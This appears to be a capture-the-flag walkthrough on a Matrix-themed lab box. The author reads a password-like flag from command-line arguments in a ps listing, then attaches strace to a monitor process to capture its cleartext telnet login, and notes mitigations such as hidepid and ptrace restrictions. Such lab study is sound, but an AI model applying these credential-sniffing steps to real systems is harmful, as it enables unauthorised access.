Alright, let's get rolling here. I'm not alone, eh... let's look at what's running again.
$ ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 37228 5304 ? Ss Jul07 0:45 /sbin/init
root 38 0.0 0.0 52032 15412 ? Ss Jul07 10:31 /lib/systemd/systemd-journald
root 84 0.0 0.0 28980 2924 ? Ss Jul07 0:02 /usr/sbin/cron -f
syslog 86 0.0 0.0 256392 4208 ? Ssl Jul07 2:11 /usr/sbin/rsyslogd -n
root 156 0.0 0.0 65508 6528 ? Ss Jul07 2:39 /usr/sbin/sshd -D
root 159 0.0 0.0 4504 1608 ? S Jul07 0:10 /bin/sh /root/files/backup.sh -u trinity -p Flag-7e0cfcf090a2fe53c97ea3edd3883d0d
root 172 0.0 0.0 15752 2212 pts/2 Ss+ Jul07 0:00 /sbin/agetty --noclear --keep-baud pts/2 115200 38400 9600 vt220
root 175 0.0 0.0 15752 2212 pts/0 Ss+ Jul07 0:00 /sbin/agetty --noclear --keep-baud pts/0 115200 38400 9600 vt220
root 176 0.0 0.0 15752 2212 ? Ss+ Jul07 0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt220
root 177 0.0 0.0 15752 2212 pts/3 Ss+ Jul07 0:00 /sbin/agetty --noclear --keep-baud pts/3 115200 38400 9600 vt220
root 179 0.0 0.0 15752 2212 pts/1 Ss+ Jul07 0:00 /sbin/agetty --noclear --keep-baud pts/1 115200 38400 9600 vt220
mysql 182 0.0 0.2 1282828 190004 ? Ssl Jul07 3:56 /usr/sbin/mysqld
root 10146 0.0 0.0 90488 6840 ? SNs 00:30 0:00 sshd: morpheus [priv]
morpheus 10157 0.0 0.0 90488 4292 ? SN 00:31 0:00 sshd: morpheus@pts/4
morpheus 10158 0.0 0.0 21180 3736 pts/4 SNs 00:31 0:00 -bash
root 10181 0.0 0.0 49932 3416 pts/4 SN 00:31 0:00 su trinity
trinity 10185 0.0 0.0 21180 3740 pts/4 SN 00:31 0:00 bash
root 12416 0.0 0.0 49932 3416 pts/4 SN 00:58 0:00 su neo
neo 12420 0.0 0.0 21172 3516 pts/4 SN 00:58 0:00 bash
root 12439 0.0 0.0 7288 640 ? S 00:59 0:00 sleep 10
root 12446 0.0 0.0 65508 6264 ? Ss 00:59 0:00 sshd: [accepted]
root 12447 0.0 0.0 90340 6816 ? Ss 00:59 0:00 sshd: unknown [priv]
sshd 12448 0.0 0.0 65508 3336 ? S 00:59 0:00 sshd: [net]
sshd 12449 0.0 0.0 65508 3336 ? S 00:59 0:00 sshd: unknown [net]
root 12450 0.0 0.0 65508 6264 ? Ss 00:59 0:00 sshd: [accepted]
sshd 12451 0.0 0.0 65508 3336 ? S 00:59 0:00 sshd: [net]
neo 12452 0.0 0.0 37364 3320 pts/4 RN+ 00:59 0:00 ps -aux
root 30389 0.0 0.0 49932 3404 ? SN Jul13 0:00 su neo -c /bin/monitor
neo 30391 0.0 0.0 4216 612 ? SNs Jul13 0:00 /bin/monitor
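Worth noting in that listing: the backup.sh process (PID 159) takes its -u/-p credentials as command-line arguments, and argv is readable by any local user through ps unless /proc is mounted with hidepid. I guess that elevated monitor service is pretty suspect... Root started it with `su neo -c /bin/monitor`, so it runs as neo, the same user I am now. Let's inspect it, shall we? Can we strace?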
$ strace
strace: must have PROG [ARGS] or -p PID
Try 'strace -h' for more information.
$ strace
$ strace 30391
strace: Can't stat '30391': No such file or directory
neo@lxc-sysadmin:/home/trinity$ strace -p 30391
strace: Process 30391 attached
restart_syscall(<... resuming interrupted nanosleep ...>) = 0
write(-1, "telnet 127.0.0.1 23\n", 20) = -1 EBADF (Bad file descriptor)
write(-1, "user\n", 5) = -1 EBADF (Bad file descriptor)
write(-1, "FLAG-xxxx\n", 31) = -1 EBADF (Bad file descriptor)
write(-1, "get-cpuinfo\n", 12) = -1 EBADF (Bad file descriptor)
nanosleep({10, 0},
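Oh shit that was too easy!! The monitor pushes its telnet login through write() in cleartext. The writes fail because the fd is -1, but strace shows the buffers anyway, and since the process runs under my own uid the attach went through. Restricting ptrace (Yama's kernel.yama.ptrace_scope) or running the service under a dedicated account instead of a login user's would have closed this off.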